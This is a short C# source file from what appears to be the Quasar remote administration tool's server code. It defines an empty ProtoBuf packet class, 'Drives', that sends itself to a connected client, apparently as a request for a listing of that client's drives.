Quasar/Server/Core/Packets/ServerPackets/Drives.cs

16 lines
266 B
C#

using ProtoBuf;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class Drives : IPacket
{
public Drives() { }
public void Execute(Client client)
{
client.Send<Drives>(this);
}
}
}